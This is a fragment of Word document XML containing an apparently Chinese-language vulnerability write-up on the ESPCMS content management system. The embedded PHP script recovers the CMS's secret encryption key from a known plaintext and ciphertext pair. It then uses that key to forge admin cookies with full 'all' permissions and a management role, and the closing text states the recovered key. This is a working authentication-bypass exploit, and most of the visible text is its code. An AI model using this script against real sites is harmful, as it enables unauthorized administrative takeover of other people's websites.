            <v:rect id="_x0000_s6172" style="position:absolute;left:2997;top:7230;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6171" style="position:absolute;left:3599;top:7230;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6170" style="position:absolute;left:3720;top:7230;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6169" style="position:absolute;left:3840;top:7230;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6168" style="position:absolute;left:3961;top:7230;width:1687;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6167" style="position:absolute;left:5648;top:7230;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6166" style="position:absolute;left:5768;top:7230;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6165" style="position:absolute;left:5889;top:7230;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6164" style="position:absolute;left:6009;top:7230;width:1808;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6163" style="position:absolute;left:1617;top:7493;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6162" style="position:absolute;left:1797;top:7556;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6161" style="position:absolute;left:1897;top:7556;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6160" style="position:absolute;left:1997;top:7556;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6159" style="position:absolute;left:2097;top:7556;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6158" style="position:absolute;left:2197;top:7556;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6157" style="position:absolute;left:2297;top:7556;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6156" style="position:absolute;left:2397;top:7556;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6155" style="position:absolute;left:2497;top:7556;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6154" style="position:absolute;left:2597;top:7556;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6153" style="position:absolute;left:2697;top:7556;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6152" style="position:absolute;left:2797;top:7556;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6151" style="position:absolute;left:2897;top:7556;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6150" style="position:absolute;left:2997;top:7556;width:1807;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6149" style="position:absolute;left:1617;top:7819;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6148" style="position:absolute;left:1797;top:7882;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6147" style="position:absolute;left:1897;top:7882;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6146" style="position:absolute;left:1997;top:7882;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6145" style="position:absolute;left:2097;top:7882;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6144" style="position:absolute;left:2197;top:7882;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6143" style="position:absolute;left:2297;top:7882;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6142" style="position:absolute;left:2397;top:7882;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6141" style="position:absolute;left:2497;top:7882;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6140" style="position:absolute;left:2597;top:7882;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6139" style="position:absolute;left:1617;top:8145;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s6138" type="#_x0000_t75" style="position:absolute;left:1797;top:8208;width:520;height:200">
              <v:imagedata r:id="rId68" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s6137" style="position:absolute;left:1617;top:8471;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:shape id="_x0000_s6136" type="#_x0000_t75" style="position:absolute;left:1797;top:8534;width:400;height:200">
              <v:imagedata r:id="rId36" o:title=""/>
            </v:shape>
            <v:rect id="_x0000_s6135" style="position:absolute;left:2197;top:8534;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6134" style="position:absolute;left:2920;top:8534;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6133" style="position:absolute;left:3040;top:8534;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6132" style="position:absolute;left:1617;top:8797;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6131" style="position:absolute;left:1797;top:8860;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6130" style="position:absolute;left:1617;top:9123;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6129" style="position:absolute;left:1617;top:9449;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6128" style="position:absolute;left:1797;top:9482;width:120;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6127" style="position:absolute;left:1917;top:9482;width:400;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6126" style="position:absolute;left:1617;top:9775;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6125" style="position:absolute;left:1797;top:9838;width:723;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6124" style="position:absolute;left:2520;top:9838;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6123" style="position:absolute;left:2640;top:9838;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6122" style="position:absolute;left:2761;top:9838;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6121" style="position:absolute;left:2861;top:9838;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6120" style="position:absolute;left:2961;top:9838;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6119" style="position:absolute;left:3061;top:9838;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6118" style="position:absolute;left:3161;top:9838;width:4217;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6117" style="position:absolute;left:1617;top:10101;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6116" style="position:absolute;left:1617;top:10427;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6115" style="position:absolute;left:1797;top:10460;width:120;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6114" style="position:absolute;left:1917;top:10460;width:400;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6113" style="position:absolute;left:1617;top:10753;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6112" style="position:absolute;left:1797;top:10816;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6111" style="position:absolute;left:2761;top:10816;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6110" style="position:absolute;left:2881;top:10816;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6109" style="position:absolute;left:3002;top:10816;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6108" style="position:absolute;left:3102;top:10816;width:100;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6107" style="position:absolute;left:1617;top:11079;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6106" style="position:absolute;left:1797;top:11142;width:5543;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6105" style="position:absolute;left:1617;top:11405;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6104" style="position:absolute;left:1617;top:11731;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6103" style="position:absolute;left:1797;top:11764;width:120;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6102" style="position:absolute;left:1917;top:11764;width:450;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6101" style="position:absolute;left:2367;top:11764;width:362;height:259" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6100" style="position:absolute;left:1617;top:12057;width:6745;height:326" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6099" style="position:absolute;left:1797;top:12120;width:602;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6098" style="position:absolute;left:2399;top:12120;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6097" style="position:absolute;left:2520;top:12120;width:120;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6096" style="position:absolute;left:2640;top:12120;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6095" style="position:absolute;left:2761;top:12120;width:2530;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6094" style="position:absolute;left:5291;top:12120;width:121;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6093" style="position:absolute;left:5412;top:12120;width:964;height:200" fillcolor="#f8f8f8" stroked="f"/>
            <v:rect id="_x0000_s6092" style="position:absolute;left:1617;top:12383;width:6745;height:506" fillcolor="#f8f8f8" stroked="f"/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:group>
        </w:pic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6090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ed="f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380" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$result</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>.=</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$char;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126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980" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$result = base64_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>encode(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$result);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$result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array('+', '/', '='),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'-', '_', ''), $result);</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126"/>
                    <w:ind w:left="579" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>} elseif ($operation == 'DECODE')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87" w:firstLine="799"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$data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array('-', '_'), array('+', '/'), $string);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980" w:right="2616"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$mod4 = </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>strlen(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$data) % 4; if ($mod4) {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:ind w:left="13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 .=</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> substr('====', $mod4);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$string = base64_</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>decode(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$data);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for</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> ($i = 0; $i &lt; strlen($string); $i++) {</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="124"/>
                    <w:ind w:left="1380" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$char = </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>substr(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$string, $i, 1);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>$keychar</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-42"/>
                    </w:rPr>
                    <w:t xml:space="preserve"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42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substr(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$key,</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-42"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>($i</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-42"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>%</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-42"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>strlen($key))</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-40"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>-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1, 1);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 xml:space="preserve">$char = </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>chr(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>ord($char) - ord($keychar));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>$result</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>.=</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$char;</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="126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$result;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61"/>
                    <w:ind w:left="180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#</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>明文</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:tabs>
                      <w:tab w:val="left" w:pos="1544"/>
                    </w:tabs>
                    <w:spacing w:before="112"/>
                    <w:ind w:left="180" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$clear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</w:rPr>
                    <w:tab/>
                    <w:t>"38a7a5650e6296b180c88f6592486fbf";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59"/>
                    <w:ind w:left="180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#</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>密文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180" w:right="251"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$encrypt = </w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>"mHGWbpJsapiRnZhjbG6WlWtnlpxqzG6XbWlsa5ufl50";</w:t>
                  </w:r>
                </w:p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22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#</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>获取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key</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="112"/>
                    <w:ind w:left="180" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>$mkey = anti_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$encrypt, $clear);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  <w:lang w:eastAsia="zh-C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6089" type="#_x0000_t202" style="width:337.5pt;height:295.3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"[*]maybe key is:".$mkey."\n";</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="62" w:line="338" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="1648"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>#</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>使用者自己根据判断裁剪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mkey</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:spacing w:val="-73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的长度获取真实的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key print "[*</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>]input</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve"> key:";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41"/>
                    <w:ind w:left="180" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$key = </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>trim(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>fgets(STDIN));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61"/>
                    <w:ind w:left="180" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>#</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>构造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cookie</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="112"/>
                    <w:ind w:left="180" w:right="50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$esp_powerlist = </w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>eccode(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'all', '</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>ENCODE', $key);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50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t xml:space="preserve">$ecisp_admininfo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eccode(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                      <w:w w:val="95"/>
                    </w:rPr>
                    <w:t>'1|hym|12345678901234567890123456789012|'.md5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50"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>('Mozilla/5.0 (Windows NT 6.1; WOW64; rv</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>:18.0</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>) Gecko/20100101 Firefox/18.0').'|1|management|'.</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>md5(</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>'http://**.**.**.</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:line="388" w:lineRule="auto"/>
                    <w:ind w:left="180" w:right="1488"/>
                  </w:pPr>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>**/espcms/adminsoft'), 'ENCODE', $key); print "</w:t>
                  </w:r>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>[+</w:t>
                  </w:r>
                  <w:proofErr w:type="gramStart"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>]esp</w:t>
                  </w:r>
                  <w:proofErr w:type="gramEnd"/>
                  <w:r>
                    <w:rPr>
                      <w:color w:val="333333"/>
                    </w:rPr>
                    <w:t>_powerlist=$esp_powerlist\n";</w:t>
                  </w:r>
                </w:p>
                <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
                  <w:pPr>
                    <w:pStyle w:val="a3"/>
                    <w:spacing w:before="2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"[+]ecisp_admininfo=$ecisp_admininfo\n";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Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman"/>
          <w:sz w:val="13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6448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122584</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3352515" cy="358330"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom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515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80020F">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:spacing w:before="84" w:line="352" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通过检查，发现后面实际是重复的，因此真正的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-60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key </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>应该是前面的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:spacing w:val="-57"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>9 57174ca8b1384d373d2f8b4783e</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="26"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="0080020F">
      <w:pPr>
        <w:ind w:left="417" w:right="317"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hint="eastAsia"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>正是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana"/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>"957174ca8b1384d373d2f8b4783e"</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00292EF3" w:rsidRDefault="00292EF3">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rFonts w:ascii="Verdana"/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
